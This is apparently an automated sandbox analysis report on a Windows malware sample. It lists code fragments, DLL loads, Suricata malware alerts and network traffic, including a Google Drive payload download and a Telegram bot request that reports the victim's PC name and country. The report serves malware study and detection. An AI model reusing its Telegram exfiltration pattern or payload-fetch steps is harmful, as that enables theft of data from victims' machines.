Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7F501h	10_2_04C7F258
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_04C70673
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7D699h	10_2_04C7D3F0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7D241h	10_2_04C7CF98
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C73080h	10_2_04C72FAE
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C7FDB1h	10_2_04C7FB08
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C70D0Dh	10_2_04C70B30
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C716F8h	10_2_04C70B30
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C97571h	10_2_04C972C8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9C39Fh	10_2_04C9C0D0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C93709h	10_2_04C93460
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C99280h	10_2_04C98FB0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C97EB5h	10_2_04C97B78
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9E38Fh	10_2_04C9E0C0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C95179h	10_2_04C94ED0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9A3AFh	10_2_04C9A0E0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C90B99h	10_2_04C908F0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C96733h	10_2_04C96488
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9D14Fh	10_2_04C9CE80
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C90741h	10_2_04C90498
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9B15Fh	10_2_04C9AE90
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C92151h	10_2_04C91EA8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C902E9h	10_2_04C90040
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9BF0Fh	10_2_04C9BC40
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C91CF9h	10_2_04C91A50
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C99F1Fh	10_2_04C99C50
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C94D21h	10_2_04C94A78
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C97119h	10_2_04C96E70
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9F13Fh	10_2_04C9EE70
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C932B1h	10_2_04C93008
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9ACCFh	10_2_04C9AA00
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C96CC1h	10_2_04C96A18
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C948C9h	10_2_04C94620
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C962D9h	10_2_04C96030
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9DEFFh	10_2_04C9DC30
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C99A8Fh	10_2_04C997C0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C95E81h	10_2_04C95BD8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9ECAFh	10_2_04C9E9E0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C918A1h	10_2_04C915F8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9CCBFh	10_2_04C9C9F0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C95A29h	10_2_04C95780
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9FA5Fh	10_2_04C9F790
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C91449h	10_2_04C911A0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9DA6Fh	10_2_04C9D7A0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C92E59h	10_2_04C92BB0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9BA7Fh	10_2_04C9B7B0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C90FF1h	10_2_04C90D48
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C92A01h	10_2_04C92758
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9E81Fh	10_2_04C9E550
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9C82Fh	10_2_04C9C560
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9A83Fh	10_2_04C9A570
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C925A9h	10_2_04C92300
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9F5CFh	10_2_04C9F300
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9D5DFh	10_2_04C9D310
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C955D1h	10_2_04C95328
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C979C9h	10_2_04C97720
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04C9B5EFh	10_2_04C9B320
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBF5E8h	10_2_04CBF2F0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB0767h	10_2_04CB0498
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB6B40h	10_2_04CB6848
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB47E8h	10_2_04CB4478
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB6678h	10_2_04CB6380
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB4E90h	10_2_04CB4B98
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBAE30h	10_2_04CBAB38
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBB7C0h	10_2_04CBB4C8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB3997h	10_2_04CB36C8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB19A7h	10_2_04CB16D8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB9FD8h	10_2_04CB9CE0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB87F0h	10_2_04CB84F8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB9180h	10_2_04CB8E88
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB2757h	10_2_04CB2488
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBE790h	10_2_04CBE498
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB7998h	10_2_04CB76A0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB61B0h	10_2_04CB5EB8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBCFA8h	10_2_04CBCCB0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB1517h	10_2_04CB1248
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBD938h	10_2_04CBD640
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB02E7h	10_2_04CB0040
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBC150h	10_2_04CBBE58
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB5358h	10_2_04CB5060
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBA968h	10_2_04CBA670
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBB2F8h	10_2_04CBB000
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB9B10h	10_2_04CB9818
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBF120h	10_2_04CBEE28
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB3507h	10_2_04CB3238
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB8328h	10_2_04CB8030
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB8CB8h	10_2_04CB89C0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB74D0h	10_2_04CB71D8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBE2C8h	10_2_04CBDFD0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB42B7h	10_2_04CB3FE8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBCAE0h	10_2_04CBC7E8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB22C7h	10_2_04CB1FF8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB5CE8h	10_2_04CB59F0
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBBC88h	10_2_04CBB990
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBA4A0h	10_2_04CBA1A8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB3078h	10_2_04CB2DA8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB1087h	10_2_04CB0DB8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBFAB0h	10_2_04CBF7B8
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB3E27h	10_2_04CB3B58
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB9648h	10_2_04CB9350
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB1E37h	10_2_04CB1B68
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB7E60h	10_2_04CB7B68
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBEC59h	10_2_04CBE960
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBD470h	10_2_04CBD178
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBDE00h	10_2_04CBDB08
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB2BE7h	10_2_04CB2918
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB7008h	10_2_04CB6D10
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB5820h	10_2_04CB5528
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CB0BF7h	10_2_04CB0928
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 04CBC618h	10_2_04CBC320
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_050EEF08
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_050EEF07
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_050EF21E
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 050F0800h	10_2_050F0508
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then jmp 050F0338h	10_2_050F0040
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_38562A80
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_38562A21

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2011/03/2025%20/%2019:20:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49702 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49700 -> 142.250.186.110:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.48.1:443

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	Process created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process created: C:\Users\user\Desktop\hUMdKouQ1H.exe "C:\Users\user\Desktop\hUMdKouQ1H.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
